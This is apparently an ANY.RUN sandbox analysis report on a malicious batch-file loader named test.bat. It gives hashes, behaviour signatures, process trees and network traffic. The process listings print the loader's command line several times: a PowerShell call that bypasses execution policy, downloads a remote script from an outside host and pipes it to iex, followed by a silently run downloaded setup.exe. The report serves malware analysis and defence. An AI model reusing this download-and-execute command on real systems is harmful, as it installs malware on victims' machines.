File name:

test.bat

Full analysis: https://app.any.run/tasks/b2b92ac1-03a8-4ea4-9b02-fcf272605079
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: October 17, 2024, 07:42:42
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

0756CC7DC1C449185883C4E33E04AF1C

SHA1:

1DAC842179866F30DCE0271BE46A06CF589C45B6

SHA256:

B3190153A44C907327E0113435715AF1A86EDEBF63E42D1BA823B7A94DA624C2

SSDEEP:

3:ohAILCywSrbSJJLNytGQqPJH0cVERAIrFZ22dZiFoUBP6GLhsSIyOGREDzWfoNkJ:ohbGnytGQO0cb+22uFZMZziEWfozU5H

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 6612)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1068)
      • powershell.exe (PID: 4292)

  • SUSPICIOUS

    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 6728)
      • cmd.exe (PID: 7124)
      • cmd.exe (PID: 6880)
      • powershell.exe (PID: 6612)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6728)
      • cmd.exe (PID: 7124)
      • cmd.exe (PID: 6880)

    • Application launched itself

      • cmd.exe (PID: 6728)
      • cmd.exe (PID: 7124)
      • cmd.exe (PID: 6880)
      • powershell.exe (PID: 6612)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6880)
      • powershell.exe (PID: 6612)

    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 6612)

    • The process executes Powershell scripts

      • powershell.exe (PID: 6612)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 4292)

    • Executable content was dropped or overwritten

      • tmpA8DE.exe (PID: 7148)
      • tmpA8DE.tmp (PID: 4144)

    • Process requests binary or script from the Internet

      • powershell.exe (PID: 4292)

  • INFO

    • Manual execution by a user

      • cmd.exe (PID: 7124)
      • notepad++.exe (PID: 2660)
      • cmd.exe (PID: 6880)

    • The executable file from the user directory is run by the Powershell process

      • tmpA8DE.exe (PID: 7148)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
152
Monitored processes
18
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs rundll32.exe no specs cmd.exe conhost.exe no specs cmd.exe no specs notepad++.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe tmpa8de.exe tmpa8de.tmp

Process information

PID
CMD
Path
Indicators
Parent process
864C:\Windows\system32\cmd.exe /d /s /c \"powershell.exe -ExecutionPolicy Bypass -Command \"$ep1 = '2879'; $ep2 = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1 C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
1068"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "\ = '2879'; = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1 | iex\"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2648C:\Windows\system32\cmd.exe /d /s /c \"powershell.exe -ExecutionPolicy Bypass -Command \"$ep1 = '2879'; $ep2 = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1 C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
2660"C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\AppData\Local\Temp\test.bat"C:\Program Files\Notepad++\notepad++.exe
explorer.exe
User:
admin
Company:
Don HO don.h@free.fr
Integrity Level:
MEDIUM
Description:
Notepad++ : a free (GNU) source code editor
Exit code:
0
Version:
7.91
Modules
Images
c:\program files\notepad++\notepad++.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.3636_none_60b6a03d71f818d5\comctl32.dll
c:\windows\system32\msvcp_win.dll
3648C:\Windows\system32\cmd.exe /d /s /c \"powershell.exe -ExecutionPolicy Bypass -Command \"$ep1 = '2879'; $ep2 = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1 C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
4144"C:\Users\admin\AppData\Local\Temp\is-NQKRN.tmp\tmpA8DE.tmp" /SL5="$12005E,21903858,832512,C:\Users\admin\AppData\Local\Temp\tmpA8DE.exe" /VERYSILENT /SUPPRESSMSGBOXES /subid= /AFFID= C:\Users\admin\AppData\Local\Temp\is-NQKRN.tmp\tmpA8DE.tmp
tmpA8DE.exe
User:
admin
Company:
Integrity Level:
MEDIUM
Description:
Setup/Uninstall
Exit code:
4
Version:
51.1052.0.0
Modules
Images
c:\users\admin\appdata\local\temp\is-nqkrn.tmp\tmpa8de.tmp
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\msvcrt.dll
4292"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "\ = '2879'; = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1 | iex"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
6184C:\Windows\system32\cmd.exe /d /s /c \"powershell.exe -ExecutionPolicy Bypass -Command \"$ep1 = '2879'; $ep2 = '212KN5C_co5cS'; iwr -UseBasicParsing -Uri https://filerit.com/phdwp.ps1 C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
6204C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
6320\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 438
Read events
18 438
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
15
Unknown types
0

Dropped files

PID
Process
Filename
Type
2660notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\stylers.xmlxml
MD5:312281C4126FA897EF21A7E8CCB8D495
SHA256:53B4BE3ED1CFD712E53542B30CFE30C5DB35CC48BE7C57727DFEC26C9E882E90
2660notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\langs.xmlxml
MD5:FE22EC5755BC98988F9656F73B2E6FB8
SHA256:F972C425CE176E960F6347F1CA2F64A8CE2B95A375C33A03E57538052BA0624D
6612powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txttext
MD5:BC4681E567253E9E38CF14849D9F1C3E
SHA256:85F35DCA3A71D02CE372438612D17760C2CC178D8AA0FA9F4B4C139B3DBC3AA9
6612powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gckn1bbt.uyk.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2660notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\config.xmlxml
MD5:A2ED875AA42589077C4D08F4F8912018
SHA256:77B0174D655F327C1FC9520B4F8831ECD82E98351B26BB9C2EDD98FF0CD63A2D
6612powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pyoc5tqu.ifr.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1068powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_banxcyv5.mqj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2660notepad++.exeC:\Users\admin\AppData\Roaming\Notepad++\plugins\config\converter.initext
MD5:F70F579156C93B097E656CABA577A5C9
SHA256:B926498A19CA95DC28964B7336E5847107DD3C0F52C85195C135D9DD6CA402D4
7148tmpA8DE.exeC:\Users\admin\AppData\Local\Temp\is-NQKRN.tmp\tmpA8DE.tmpexecutable
MD5:D1E798672DC61A6CC978E21D4FB86286
SHA256:37B266ABF92C47409319348DD6B584BBCE66753360077B59D26652773B0F091E
4292powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aotvzlir.0c5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
73
DNS requests
24
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4360
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4376
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1588
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
5168
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5168
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4360
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
4292
powershell.exe
GET
200
18.245.78.104:80
http://d18liq5eiez7ig.cloudfront.net/setup.exe
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4020
svchost.exe
239.255.255.250:1900
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
6944
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
816
svchost.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
4360
SearchApp.exe
2.23.209.189:443
www.bing.com
Akamai International B.V.
GB
whitelisted
4360
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4376
svchost.exe
40.126.31.67:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4376
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.23.209.189
  • 2.23.209.187
  • 2.23.209.133
  • 2.23.209.132
  • 2.23.209.135
  • 2.23.209.186
  • 2.23.209.183
  • 2.23.209.130
  • 2.23.209.185
  • 92.123.104.46
  • 92.123.104.56
  • 92.123.104.57
  • 92.123.104.51
  • 92.123.104.58
  • 92.123.104.52
  • 92.123.104.45
  • 92.123.104.55
  • 92.123.104.47
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 40.126.31.67
  • 40.126.31.73
  • 20.190.159.68
  • 20.190.159.75
  • 20.190.159.4
  • 20.190.159.2
  • 20.190.159.64
  • 20.190.159.71
whitelisted
th.bing.com
  • 2.23.209.167
  • 2.23.209.180
  • 2.23.209.177
  • 2.23.209.173
  • 2.23.209.171
  • 2.23.209.175
  • 2.23.209.176
  • 2.23.209.166
  • 2.23.209.179
  • 92.123.104.63
  • 92.123.104.9
  • 92.123.104.6
  • 92.123.104.7
  • 92.123.104.67
  • 92.123.104.65
  • 92.123.104.66
  • 92.123.104.64
  • 92.123.104.62
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
www.microsoft.com
  • 23.52.120.96
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted

Threats

PID
Process
Class
Message
4292
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
4292
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4292
powershell.exe
Potentially Bad Traffic
ET POLICY Executable served from Amazon S3
4292
powershell.exe
Misc activity
ET INFO Request for EXE via Powershell
Process
Message
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: error while getting certificate informations
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
test.bat